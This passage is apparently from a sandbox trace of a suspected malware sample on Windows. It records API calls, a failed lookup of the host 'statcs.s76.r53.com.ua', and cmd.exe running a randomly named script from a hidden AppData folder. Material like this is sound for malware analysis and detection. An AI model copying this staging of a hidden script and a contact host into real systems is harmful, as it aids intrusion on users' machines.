wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] VirtualFree (lpAddress=0x1410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.716] FreeLibrary (hLibModule=0x76910000) returned 1 [0098.716] LocalFree (hMem=0x724438) returned 0x0 [0098.717] FreeLibrary (hLibModule=0x76910000) returned 1 [0098.717] LocalFree (hMem=0x724428) returned 0x0 [0098.717] ExitProcess (uExitCode=0x0) Thread: id = 29 os_tid = 0xbdc [0098.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x1508514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0098.139] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1541ffc, cbMultiByte=27, lpWideCharStr=0x3fed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0098.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0098.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x14fa714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0098.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x150867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0098.139] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x3ffb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x3ffbac | out: ppResult=0x3ffbac*=0x0) returned 11001 [0098.228] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x3ffb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x3ffbac | out: ppResult=0x3ffbac*=0x0) returned 11001 [0098.274] getnameinfo (in: pSockaddr=0x3ffc14, SockaddrLength=0x0, pNodeBuffer=0x146bc7c, NodeBufferSize=0x401, pServiceBuffer=0x1525124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="s", pServiceBuffer="") returned 10047 [0098.274] htons (hostshort=0x0) returned 0x0 [0098.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0098.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] SetEvent (hEvent=0x84) returned 1 [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] CloseHandle (hObject=0xb8) returned 1 [0098.274] RtlExitUserThread (Status=0x0) Thread: id = 30 os_tid = 0xbe0 Process: id = "21" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16900" os_pid = "0xbcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xb74" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1353 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1354 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1355 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1356 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1357 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1358 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1359 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1360 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1361 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1362 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1593 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1594 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1595 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1596 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1597 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1598 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1599 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1600 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1601 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1602 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1603 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1604 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1605 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1606 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1607 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1608 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1609 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1610 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1611 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1612 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1613 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1614 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1615 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1616 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 1617 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1618 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1619 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1620 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1630 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 28 os_tid = 0xbd0 [0099.540] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fdc4 | out: lpSystemTimeAsFileTime=0x16fdc4*(dwLowDateTime=0x7956f660, dwHighDateTime=0x1d440a9)) [0099.540] GetCurrentProcessId () returned 0xbcc [0099.540] GetCurrentThreadId () returned 0xbd0 [0099.540] GetTickCount () returned 0x23c73 [0099.540] QueryPerformanceCounter (in: lpPerformanceCount=0x16fdbc | out: lpPerformanceCount=0x16fdbc*=15632935145) returned 1 [0099.541] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0099.541] __set_app_type (_Type=0x1) [0099.541] __p__fmode () returned 0x76b331f4 [0099.541] __p__commode () returned 0x76b331fc [0099.541] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0099.541] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0099.541] GetCurrentThreadId () returned 0xbd0 [0099.541] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbd0) returned 0x38 [0099.541] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0099.541] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0099.541] SetThreadUILanguage (LangId=0x0) returned 0x409 [0099.541] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.541] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fd54 | out: phkResult=0x16fd54*=0x0) returned 0x2 [0099.542] VirtualQuery (in: lpAddress=0x16fd8b, lpBuffer=0x16fd24, dwLength=0x1c | out: lpBuffer=0x16fd24*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0099.542] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fd24, dwLength=0x1c | out: lpBuffer=0x16fd24*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0099.542] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fd24, dwLength=0x1c | out: lpBuffer=0x16fd24*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0099.542] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fd24, dwLength=0x1c | out: lpBuffer=0x16fd24*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0099.542] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fd24, dwLength=0x1c | out: lpBuffer=0x16fd24*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0099.542] GetConsoleOutputCP () returned 0x1b5 [0099.542] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0099.542] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0099.542] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.542] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0099.542] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.542] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0099.542] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.542] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0099.542] _get_osfhandle (_FileHandle=0) returned 0x3 [0099.542] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0099.543] _get_osfhandle (_FileHandle=0) returned 0x3 [0099.543] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0099.543] GetEnvironmentStringsW () returned 0x1b0150* [0099.543] FreeEnvironmentStringsW (penv=0x1b0150) returned 1 [0099.543] GetEnvironmentStringsW () returned 0x1b0150* [0099.543] FreeEnvironmentStringsW (penv=0x1b0150) returned 1 [0099.543] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ecc4 | out: phkResult=0x16ecc4*=0x40) returned 0x0 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x0, lpData=0x16ecd0*=0x0, lpcbData=0x16ecc8*=0x1000) returned 0x2 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x1, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x0, lpData=0x16ecd0*=0x1, lpcbData=0x16ecc8*=0x1000) returned 0x2 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x0, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x40, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x40, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x0, lpData=0x16ecd0*=0x40, lpcbData=0x16ecc8*=0x1000) returned 0x2 [0099.543] RegCloseKey (hKey=0x40) returned 0x0 [0099.543] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ecc4 | out: phkResult=0x16ecc4*=0x40) returned 0x0 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x0, lpData=0x16ecd0*=0x40, lpcbData=0x16ecc8*=0x1000) returned 0x2 [0099.544] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x1, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.544] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x0, lpData=0x16ecd0*=0x1, lpcbData=0x16ecc8*=0x1000) returned 0x2 [0099.544] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, 